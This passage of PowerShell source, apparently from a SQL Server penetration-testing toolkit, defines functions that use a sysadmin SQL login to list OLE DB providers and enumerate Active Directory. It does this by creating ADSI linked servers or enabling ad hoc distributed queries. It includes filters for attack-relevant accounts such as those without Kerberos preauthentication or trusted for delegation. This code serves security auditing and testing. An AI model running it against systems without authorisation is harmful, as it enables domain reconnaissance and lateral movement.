[string]$_.SessionId, [string]$_.SessionStartTime, [string]$_.SessionLoginTime, [string]$_.SessionStatus) } } End { # Return data $TblSessions } } # ---------------------------------- # Get-SQLOleDbProvder # ---------------------------------- # Author: Scott Sutherland Function Get-SQLOleDbProvder { <# .SYNOPSIS Returns a list of the providers installede on SQL Servers and their properties. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER Threads Number of concurrent host threads. PS C:\> Get-SQLOleDbProvder -Instance SQLServer1\STANDARDDEV2014 -Verbose ProviderName : SQLNCLI11 ProviderDescription : SQL Server Native Client 11.0 ProviderParseName : {397C2819-8272-4532-AD3A-FB5E43BEAA39} AllowInProcess : 1 DisallowAdHocAccess : 0 DynamicParameters : 0 IndexAsAccessPath : 0 LevelZeroOnly : 0 NestedQueries : 0 NonTransactedUpdates : 0 SqlServerLIKE : 0 ... .EXAMPLE PS C:\> Get-SQLOleDbProvder -Instance SQLServer1\STANDARDDEV2014 -Verbose | FT -AutoSize ProviderName ProviderDescription ProviderParseName Allo ------------ ------------------- ----------------- ---- SQLOLEDB Microsoft OLE DB Provider for SQL Server {0C7FF16C-38E3-11d0-97AB-00C04FC2AD98} 0 SQLNCLI11 SQL Server Native Client 11.0 {397C2819-8272-4532-AD3A-FB5E43BEAA39} 1 Microsoft.ACE.OLEDB.12.0 Microsoft Office 12.0 Access Database Engine OLE DB Provider {3BE786A0-0366-4F5C-9434-25CF162E475E} 0 Microsoft.ACE.OLEDB.15.0 Microsoft Office 15.0 Access Database Engine OLE DB Provider {3BE786A1-0366-4F5C-9434-25CF162E475E} 0 ADsDSOObject OLE DB Provider for Microsoft Directory Services {549365d0-ec26-11cf-8310-00aa00b505db} 1 SSISOLEDB OLE DB Provider for SQL Server Integration Services {688037C5-0B57-464B-A953-90A806CC34C2} 0 Search.CollatorDSO Microsoft OLE DB Provider for Search {9E175B8B-F52A-11D8-B9A5-505054503030} 0 MSDASQL Microsoft OLE DB Provider for ODBC Drivers {c8b522cb-5cf3-11ce-ade5-00aa0044773d} 1 MSOLAP Microsoft OLE DB Provider for Analysis Services 14.0 {DBC724B0-DD86-4772-BB5A-FCC6CAB2FC1A} 1 MSDAOSP Microsoft OLE DB Simple Provider {dfc8bdc0-e378-11d0-9b30-0080c7e9fe95} 0 ... .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLOleDbProvder -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Number of threads.')] [int]$Threads = 2, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Create data tables for output $TblResults = New-Object -TypeName System.Data.DataTable $TblProviders = New-Object -TypeName System.Data.DataTable $null = $TblProviders.Columns.Add('ComputerName') $null = $TblProviders.Columns.Add('Instance') $null = $TblProviders.Columns.Add('ProviderName') $null = $TblProviders.Columns.Add('ProviderDescription') $null = $TblProviders.Columns.Add('ProviderParseName') $null = $TblProviders.Columns.Add('AllowInProcess') $null = $TblProviders.Columns.Add('DisallowAdHocAccess') $null = $TblProviders.Columns.Add('DynamicParameters') $null = $TblProviders.Columns.Add('IndexAsAccessPath') $null = $TblProviders.Columns.Add('LevelZeroOnly') $null = $TblProviders.Columns.Add('NestedQueries') $null = $TblProviders.Columns.Add('NonTransactedUpdates') $null = $TblProviders.Columns.Add('SqlServerLIKE') # Setup data table for pipeline threading $PipelineItems = New-Object -TypeName System.Data.DataTable # set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Ensure provided instance is processed if($Instance) { $ProvideInstance = New-Object -TypeName PSObject -Property @{ Instance = $Instance } } # Add instance to instance list $PipelineItems = $PipelineItems + $ProvideInstance } Process { # Create list of pipeline items $PipelineItems = $PipelineItems + $_ } End { # Define code to be multi-threaded $MyScriptBlock = { # Set instance $Instance = $_.Instance # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Check sysadmin $IsSysadmin = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin if($IsSysadmin -eq "No") { If (-not($SuppressVerbose)){ Write-Verbose -Message "$Instance : This command requires sysadmin privileges. Exiting." } return }else{ If (-not($SuppressVerbose)){ Write-Verbose -Message "$Instance : You have sysadmin privileges." Write-Verbose -Message "$Instance : Grabbing list of providers." } } # SetUp Query $Query = " -- Name: Get-SQLOleDbProvider.sql -- Description: Get a list of OLE provider along with their current settings. -- Author: Scott Sutherland, NetSPI 2017 -- Get a list of providers CREATE TABLE #Providers ([ProviderName] varchar(8000), [ParseName] varchar(8000), [ProviderDescription] varchar(8000)) INSERT INTO #Providers EXEC xp_enum_oledb_providers -- Create temp table for provider information CREATE TABLE #ProviderInformation ([ProviderName] varchar(8000), [ProviderDescription] varchar(8000), [ProviderParseName] varchar(8000), [AllowInProcess] int, [DisallowAdHocAccess] int, [DynamicParameters] int, [IndexAsAccessPath] int, [LevelZeroOnly] int, [NestedQueries] int, [NonTransactedUpdates] int, [SqlServerLIKE] int) -- Setup required variables for cursor DECLARE @Provider_name varchar(8000); DECLARE @Provider_parse_name varchar(8000); DECLARE @Provider_description varchar(8000); DECLARE @property_name varchar(8000) DECLARE @regpath nvarchar(512) -- Start cursor DECLARE MY_CURSOR1 CURSOR FOR SELECT * FROM #Providers OPEN MY_CURSOR1 FETCH NEXT FROM MY_CURSOR1 INTO @Provider_name,@Provider_parse_name,@Provider_description WHILE @@FETCH_STATUS = 0 BEGIN -- Set the registry path SET @regpath = N'SOFTWARE\Microsoft\MSSQLServer\Providers\' + @provider_name -- AllowInProcess DECLARE @AllowInProcess int SET @AllowInProcess = 0 exec sys.xp_instance_regread N'HKEY_LOCAL_MACHINE',@regpath,'AllowInProcess', @AllowInProcess OUTPUT IF @AllowInProcess IS NULL SET @AllowInProcess = 0 -- DisallowAdHocAccess DECLARE @DisallowAdHocAccess int SET @DisallowAdHocAccess = 0 exec sys.xp_instance_regread N'HKEY_LOCAL_MACHINE',@regpath,'DisallowAdHocAccess', @DisallowAdHocAccess OUTPUT IF @DisallowAdHocAccess IS NULL SET @DisallowAdHocAccess = 0 -- DynamicParameters DECLARE @DynamicParameters int SET @DynamicParameters = 0 exec sys.xp_instance_regread N'HKEY_LOCAL_MACHINE',@regpath,'DynamicParameters', @DynamicParameters OUTPUT IF @DynamicParameters IS NULL SET @DynamicParameters = 0 -- IndexAsAccessPath DECLARE @IndexAsAccessPath int SET @IndexAsAccessPath = 0 exec sys.xp_instance_regread N'HKEY_LOCAL_MACHINE',@regpath,'IndexAsAccessPath', @IndexAsAccessPath OUTPUT IF @IndexAsAccessPath IS NULL SET @IndexAsAccessPath = 0 -- LevelZeroOnly DECLARE @LevelZeroOnly int SET @LevelZeroOnly = 0 exec sys.xp_instance_regread N'HKEY_LOCAL_MACHINE',@regpath,'LevelZeroOnly', @LevelZeroOnly OUTPUT IF @LevelZeroOnly IS NULL SET @LevelZeroOnly = 0 -- NestedQueries DECLARE @NestedQueries int SET @NestedQueries = 0 exec sys.xp_instance_regread N'HKEY_LOCAL_MACHINE',@regpath,'NestedQueries', @NestedQueries OUTPUT IF @NestedQueries IS NULL SET @NestedQueries = 0 -- NonTransactedUpdates DECLARE @NonTransactedUpdates int SET @NonTransactedUpdates = 0 exec sys.xp_instance_regread N'HKEY_LOCAL_MACHINE',@regpath,'NonTransactedUpdates', @NonTransactedUpdates OUTPUT IF @NonTransactedUpdates IS NULL SET @NonTransactedUpdates = 0 -- SqlServerLIKE DECLARE @SqlServerLIKE int SET @SqlServerLIKE = 0 exec sys.xp_instance_regread N'HKEY_LOCAL_MACHINE',@regpath,'SqlServerLIKE', @SqlServerLIKE OUTPUT IF @SqlServerLIKE IS NULL SET @SqlServerLIKE = 0 -- Add the full provider record to the temp table INSERT INTO #ProviderInformation VALUES (@Provider_name,@Provider_description,@Provider_parse_name,@AllowInProcess,@DisallowAdHocAccess,@DynamicParameters,@IndexAsAccessPath,@LevelZeroOnly,@NestedQueries,@NonTransactedUpdates,@SqlServerLIKE); FETCH NEXT FROM MY_CURSOR1 INTO @Provider_name,@Provider_parse_name,@Provider_description END -- Return records SELECT * FROM #ProviderInformation -- Clean up CLOSE MY_CURSOR1 DEALLOCATE MY_CURSOR1 DROP TABLE #Providers DROP TABLE #ProviderInformation" # Execute Query $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Append results for pipeline items $TblResults | ForEach-Object -Process { # Add record to master table $null = $TblProviders.Rows.Add( $ComputerName, $Instance, $_.ProviderName, $_.ProviderDescription, $_.ProviderParseName, $_.AllowInProcess, $_.DisallowAdHocAccess, $_.DynamicParameters, $_.IndexAsAccessPath, $_.LevelZeroOnly, $_.NestedQueries, $_.NonTransactedUpdates, $_.SqlServerLIKE ) } } # Run scriptblock using multi-threading $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue return $TblProviders } } # ---------------------------------- # Get-SQLDomainObject # ---------------------------------- # Author: Scott Sutherland # Reference: LDAP templates are based on MSDN and PowerView by Will Schroeder (@HarmJ0y). Function Get-SQLDomainObject { <# .SYNOPSIS Using the OLE DB ADSI provider, query Active Directory for a list of domain objects via the domain logon server associated with the SQL Server. This can be done using a SQL Server link (OpenQuery) or AdHoc query (OpenRowset). Use the -UseAdHoc flag to switch between modes. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER LinkUsername Domain account used to authenticate to LDAP through SQL Server ADSI link. .PARAMETER LinkPassword Domain account password used to authenticate to LDAP through SQL Server ADSI link. .PARAMETER UseAdHoc Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER Threads Number of concurrent host threads. .PARAMETER LdapPath Ldap path. .PARAMETER LdapFilter LDAP filter. Example: -LdapFilter ";(&(objectCategory=Person)(objectClass=user))" .PARAMETER LdapFields Ldap fields. Example -LdapFields 'samaccountname,name,admincount,whencreated,whenchanged,adspath;' .EXAMPLE PS C:\> Get-SQLDomainObject -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LdapFilter "(&(objectCategory=Person)(objectClass=user))" -LdapFields "samaccountname,name,admincount,whencreated,whenchanged,adspath" -LdapPath "domain.local" .EXAMPLE PS C:\> Get-SQLDomainObject -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LinkUsername 'domain\user' -LinkPassword 'Password123!' .EXAMPLE PS C:\> Get-SQLDomainObject -Instance SQLServer1\STANDARDDEV2014 -Verbose .EXAMPLE PS C:\> Get-SQLDomainObject -Instance SQLServer1\STANDARDDEV2014 -Verbose -LinkUsername 'domain\user' -LinkPassword 'Password123!' .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLDomainObject -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate to SQL Server.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate to SQL Server.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Domain account used to authenticate to LDAP through SQL Server ADSI link.')] [string]$LinkUsername, [Parameter(Mandatory = $false, HelpMessage = 'Domain account password used to authenticate to LDAP through SQL Server ADSI link.')] [string]$LinkPassword, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet.')] [Switch]$UseAdHoc, [Parameter(Mandatory = $false, HelpMessage = 'Number of threads. This is the number of instance to process at a time')] [int]$Threads = 2, [Parameter(Mandatory = $false, HelpMessage = 'Ldap path. domain/dc=domain,dc=local')] [string]$LdapPath, [Parameter(Mandatory = $false, HelpMessage = 'Ldap filter. Example: (&(objectCategory=Person)(objectClass=user))')] [string]$LdapFilter, [Parameter(Mandatory = $false, HelpMessage = 'Ldap fields. Example: samaccountname,name,admincount,whencreated,whenchanged,adspath')] [string]$LdapFields, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Create data tables for output $TblResults = New-Object -TypeName System.Data.DataTable $TblDomainObjects = New-Object -TypeName System.Data.DataTable } Process { # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Check sysadmin $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $DomainName = $ServerInfo.DomainName $IsSysadmin = $ServerInfo.IsSysadmin $ServiceAccount = $ServerInfo.ServiceAccount $SQLServerMajorVersion = $ServerInfo.SQLServerMajorVersion $SQLServerEdition = $ServerInfo.SQLServerEdition $SQLServerVersionNumber = $ServerInfo.SQLServerVersionNumber $SQLCurrentLogin = $ServerInfo.Currentlogin # Status user If (-not($SuppressVerbose)){ Write-Verbose -Message "$instance : Login: $SQLCurrentLogin" Write-Verbose -Message "$Instance : Domain: $DomainName" Write-Verbose -Message "$Instance : Version: SQL Server $SQLServerMajorVersion $SQLServerEdition ($SQLServerVersionNumber)" } if($IsSysadmin -eq "No") { If (-not($SuppressVerbose)){ Write-Verbose -Message "$Instance : Sysadmin: No" Write-Verbose -Message "$Instance : This command requires sysadmin privileges. Exiting." } return }else{ If (-not($SuppressVerbose)){ Write-Verbose -Message "$Instance : Sysadmin: Yes" } } # When the following conditions are met stop, because it won't work # sysadmin (implicit at this point in the code) + type sql login + no adhoc or provided link cred if ($SQLCurrentLogin -notlike "*\*") { if(($UseAdHoc) -or ($LinkPassword)){ # note }else{ Write-Verbose -Message "$Instance : A SQL Login with sysadmin privileges cannot execute ASDI queries through a linked server by itself." Write-Verbose -Message "$Instance : Try one of the following:" Write-Verbose -Message "$Instance : - Run the command again with the -UseAdHoc flag " Write-Verbose -Message "$Instance : - Run the command again and provide -LinkUser and -LinkPassword" return } } # Setup the LDAP Path if(-not $LdapPath ){ $LdapPath = $DomainName } # Check if adsi is installed and can run in process $CheckEnabled = Get-SQLOleDbProvder -Instance $Instance -Username $Username -Password $Password -SuppressVerbose | Where ProviderName -like "ADsDSOObject" | Select-Object AllowInProcess -ExpandProperty AllowInProcess if ($CheckEnabled -ne 1){ Write-Verbose -Message "$Instance : ADsDSOObject provider allowed to run in process: No" Write-Verbose -Message "$Instance : The ADsDSOObject provider is not allowed to run in process. Stopping operation." return }else{ Write-Verbose -Message "$Instance : ADsDSOObject provider allowed to run in process: Yes" } # Determine query type if($UseAdHoc){ If (-not($SuppressVerbose)){ if ($SQLCurrentLogin -like "*\*"){ Write-Verbose -Message "$Instance : Executing in AdHoc mode using OpenRowSet as '$SQLCurrentLogin'." }else{ if(-not $LinkUsername){ Write-Verbose -Message "$Instance : Executing in AdHoc mode using OpenRowSet as the SQL Server service account ($ServiceAccount)." }else{ Write-Verbose -Message "$Instance : Executing in AdHoc mode using OpenRowSet as '$LinkUsername'." } } } }else{ If (-not($SuppressVerbose)){ Write-Verbose -Message "$Instance : Executing in Link mode using OpenQuery." } } # Create ADSI Link (if link) if(-not $UseAdHoc){ # Create Random Name $RandomLinkName = (-join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})) # Status user If (-not($SuppressVerbose)){ Write-Verbose -Message "$Instance : Creating ADSI SQL Server link named $RandomLinkName." } # Create Link $QueryCreateLink = " -- Create SQL Server link to ADSI IF (SELECT count(*) FROM master..sysservers WHERE srvname = '$RandomLinkName') = 0 EXEC master.dbo.sp_addlinkedserver @server = N'$RandomLinkName', @srvproduct=N'Active Directory Service Interfaces', @provider=N'ADSDSOObject', @datasrc=N'adsdatasource' ELSE SELECT 'The target SQL Server link already exists.'" # Run query to create link $QueryCreateLinkResults = Get-SQLQuery -Instance $Instance -Query $QueryCreateLink -Username $Username -Password $Password -Credential $Credential -ReturnError # Associate login with the link if(($LinkUsername) -and ($LinkPassword)){ # Status user If (-not($SuppressVerbose)){ Write-Verbose -Message "$Instance : Associating login '$LinkUsername' with ADSI SQL Server link named $RandomLinkName." } $QueryAssociateLogin = " EXEC sp_addlinkedsrvlogin @rmtsrvname=N'$RandomLinkName', @useself=N'False', @locallogin=NULL, @rmtuser=N'$LinkUsername', @rmtpassword=N'$LinkPassword'" }else{ # Status user If (-not($SuppressVerbose)){ Write-Verbose -Message "$Instance : Associating '$SQLCurrentLogin' with ADSI SQL Server link named $RandomLinkName." } $QueryAssociateLogin = " -- Current User Context -- Notes: testing tbd, sql login (non sysadmin), sql login (sysadmin), windows login (nonsysadmin), windows login (sysadmin), - test passthru and provided creds EXEC sp_addlinkedsrvlogin @rmtsrvname=N'$RandomLinkName', @useself=N'True', @locallogin=NULL, @rmtuser=NULL, @rmtpassword=NULL" } # Run query to associate login with link Get-SQLQuery -Instance $Instance -Query $QueryAssociateLogin -Username $Username -Password $Password -Credential $Credential -SuppressVerbose } # Enable AdHoc Queries (if adhoc and required) if($UseAdHoc){ # Get current state $Original_State_ShowAdv = Get-SQLQuery -Instance $Instance -Query "SELECT value_in_use FROM master.sys.configurations WHERE name like 'show advanced options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object value_in_use -ExpandProperty value_in_use $Original_State_AdHocQuery = Get-SQLQuery -Instance $Instance -Query "SELECT value_in_use FROM master.sys.configurations WHERE name like 'Ad Hoc Distributed Queries'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object value_in_use -ExpandProperty value_in_use # Enable 'Show Advanced Options' if($Original_State_ShowAdv -eq 0){ # Execute Query Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',1;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Status user If (-not($SuppressVerbose)){ Write-Verbose -Message "$Instance : Enabling 'Show Advanced Options'" } }else{ If (-not($SuppressVerbose)){ Write-Verbose -Message "$Instance : 'Show Advanced Options' is already enabled" } } # Enable 'Ad Hoc Distributed Queries' if($Original_State_AdHocQuery -eq 0){ # Execute Query Get-SQLQuery -Instance $Instance -Query "sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Status user If (-not($SuppressVerbose)){ Write-Verbose -Message "$Instance : Enabling 'Ad Hoc Distributed Queries'" } }else{ If (-not($SuppressVerbose)){ Write-Verbose -Message "$Instance : 'Ad Hoc Distributed Queries' are already enabled" } } } # SetUp LDAP Query if($UseAdHoc){ # Define adhoc query auth if(($LinkUsername) -and ($LinkPassword)){ $AdHocAuth = "User ID=$LinkUsername; Password=$LinkPassword;" }else{ $AdHocAuth = "adsdatasource" } # Define adhoc query $Query = " -- Run with credential in syntax option 1 - works as sa SELECT * FROM OPENROWSET('ADSDSOOBJECT','$AdHocAuth', ';$LdapFilter;$LdapFields;subtree')" }else{ # Define link query $Query = "SELECT * FROM OpenQuery($RandomLinkName,';$LdapFilter;$LdapFields;subtree')" } # Display TSQL Query # Write-verbose "Query: $Query" # Status user If (-not($SuppressVerbose)){ Write-Verbose -Message "$Instance : LDAP query against logon server using ADSI OLEDB started..." } # Execute Query $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential # Add results to table $TblDomainObjects += $TblResults # Remove ADSI Link (if Link) if(-not $UseAdHoc){ # Status user If (-not($SuppressVerbose)){ Write-Verbose -Message "$Instance : Removing ADSI SQL Server link named $RandomLinkName" } # Setup query to remove link $RemoveLinkQuery = "EXEC master.dbo.sp_dropserver @server=N'$RandomLinkName', @droplogins='droplogins'" # Run query to remove link $RemoveLinkQueryResults = Get-SQLQuery -Instance $Instance -Query $RemoveLinkQuery -Username $Username -Password $Password -Credential $Credential -SuppressVerbose } # Restore AdHoc State (if adhoc) if($UseAdHoc){ # Status user If (-not($SuppressVerbose)){ Write-Verbose -Message "$Instance : Restoring AdHoc settings if needed." } # Restore ad hoc queries Get-SQLQuery -Instance $Instance -Query "sp_configure 'Ad Hoc Distributed Queries',$Original_State_AdHocQuery;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Restore Show advanced options Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',$Original_State_ShowAdv;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose } # Status user If (-not($SuppressVerbose)){ Write-Verbose -Message "$Instance : LDAP query against logon server using ADSI OLEDB complete." } } End { # Return record count $RecordCount = $TblDomainObjects.Row.count # Status user If (-not($SuppressVerbose)){ Write-Verbose -Message "$Instance : $RecordCount records were found." } # Return records return $TblDomainObjects } } # ---------------------------------- # Get-SQLDomainUser # ---------------------------------- # Author: Scott Sutherland, Thomas Elling Function Get-SQLDomainUser { <# .SYNOPSIS Using the OLE DB ADSI provider, query Active Directory for a list of domain users via the domain logon server associated with the SQL Server. This can be done using a SQL Server link (OpenQuery) or AdHoc query (OpenRowset). Use the -UseAdHoc flag to switch between modes. The userstate parameter can also be used to filter users by state such as disabled/locked, and property setting such as not requiring a password or kerberos preauthentication. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER LinkUsername Domain account used to authenticate to LDAP through SQL Server ADSI link. .PARAMETER LinkPassword Domain account password used to authenticate to LDAP through SQL Server ADSI link. .PARAMETER UseAdHoc Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER FilterUser Domain user to filter for. .PARAMETER UserState Filter for users of specific state such as disabled, enabled, and locked. .EXAMPLE PS C:\> Get-SQLDomainUser -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc Only grab enabled users. .EXAMPLE PS C:\> Get-SQLDomainUser -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -UserState All Only grab enabled users. .EXAMPLE PS C:\> Get-SQLDomainUser -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -UserState Enabled Only grab disabled users. .EXAMPLE PS C:\> Get-SQLDomainUser -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -UserState Disabled Only grab that don't require kerberos preauthentication. PS C:\> Get-SQLDomainUser -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -UserState PreAuthNotRequired Only grab locked users. .EXAMPLE PS C:\> Get-SQLDomainUser -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -UserState Locked .EXAMPLE PS C:\> Get-SQLDomainUser -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LinkUsername 'domain\user' -LinkPassword 'Password123!' .EXAMPLE PS C:\> Get-SQLDomainUser -Instance SQLServer1\STANDARDDEV2014 -Verbose .EXAMPLE PS C:\> Get-SQLDomainUser -Instance SQLServer1\STANDARDDEV2014 -Verbose -LinkUsername 'domain\user' -LinkPassword 'Password123!' .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLDomainUser -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate to SQL Server.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate to SQL Server.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Domain account used to authenticate to LDAP through SQL Server ADSI link.')] [string]$LinkUsername, [Parameter(Mandatory = $false, HelpMessage = 'Domain account password used to authenticate to LDAP through SQL Server ADSI link.')] [string]$LinkPassword, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet.')] [Switch]$UseAdHoc, [Parameter(Mandatory = $false, HelpMessage = 'Filter users based on state or property settings.')] [ValidateSet("All","Enabled","Disabled","Locked","PwNeverExpires","PwNotRequired","PreAuthNotRequired","SmartCardRequired","TrustedForDelegation","TrustedToAuthForDelegation","PwStoredRevEnc")] [String]$UserState, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Domain user to filter for.')] [string]$FilterUser, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Only list the users who have not changed their password in the number of days provided.')] [Int]$PwLastSet, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Setup user filter if((-not $FilterUser)){ $FilterUser = '*' } # Setup user state / property filter if((-not $PwLastSet)){ $PwLastSetFilter = "" }else{ # Get number of days from user and convert to timestamp $DesiredTimeStamp = (Get-Date).AddDays(-$PwLastSet).ToFileTime() # Use timestamp to create filter to only list the users who have not changed their password in the number of days provided. $PwLastSetFilter = "(!pwdLastSet>=$DesiredTimeStamp)" } # Setup user state filter switch ($UserState) { "All" {$UserStateFilter = ""} "Enabled" {$UserStateFilter = "(!userAccountControl:1.2.840.113556.1.4.803:=2)"} "Disabled" {$UserStateFilter = "(userAccountControl:1.2.840.113556.1.4.803:=2)"} "Locked" {$UserStateFilter = "(sAMAccountType=805306368)(lockoutTime>0)"} "PwNeverExpires" {$UserStateFilter = "(userAccountControl:1.2.840.113556.1.4.803:=65536)"} "PwNotRequired" {$UserStateFilter = "(userAccountControl:1.2.840.113556.1.4.803:=32)"} "PwStoredRevEnc" {$UserStateFilter = "(userAccountControl:1.2.840.113556.1.4.803:=128)"} "PreAuthNotRequired" {$UserStateFilter = "(userAccountControl:1.2.840.113556.1.4.803:=4194304)"} "SmartCardRequired" {$UserStateFilter = "(userAccountControl:1.2.840.113556.1.4.803:=262144)"} "TrustedForDelegation" {$UserStateFilter = "(userAccountControl:1.2.840.113556.1.4.803:=524288)"} "TrustedToAuthForDelegation" {$UserStateFilter = "(userAccountControl:1.2.840.113556.1.4.803:=16777216)"} } } Process { # Call Get-SQLDomainObject if($UseAdHoc){ Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter "(&(objectCategory=Person)(objectClass=user)$PwLastSetFilter(SamAccountName=$FilterUser)$UserStateFilter)" -LdapFields "samaccountname,name,admincount,whencreated,whenchanged,adspath" -UseAdHoc }else{ Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter "(&(objectCategory=Person)(objectClass=user)$PwLastSetFilter(SamAccountName=$FilterUser)$UserStateFilter)" -LdapFields "samaccountname,name,admincount,whencreated,whenchanged,adspath" } } End { } } # ---------------------------------- # Get-SQLDomainSubnet # ---------------------------------- # Author: Scott Sutherland, Thomas Elling Function Get-SQLDomainSubnet { <# .SYNOPSIS Using the OLE DB ADSI provider, query Active Directory for a list of domain subnets via the domain logon server associated with the SQL Server. This can be done using a SQL Server link (OpenQuery) or AdHoc query (OpenRowset). Use the -UseAdHoc flag to switch between modes. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER LinkUsername Domain account used to authenticate to LDAP through SQL Server ADSI link. .PARAMETER LinkPassword Domain account password used to authenticate to LDAP through SQL Server ADSI link. .PARAMETER UseAdHoc Use 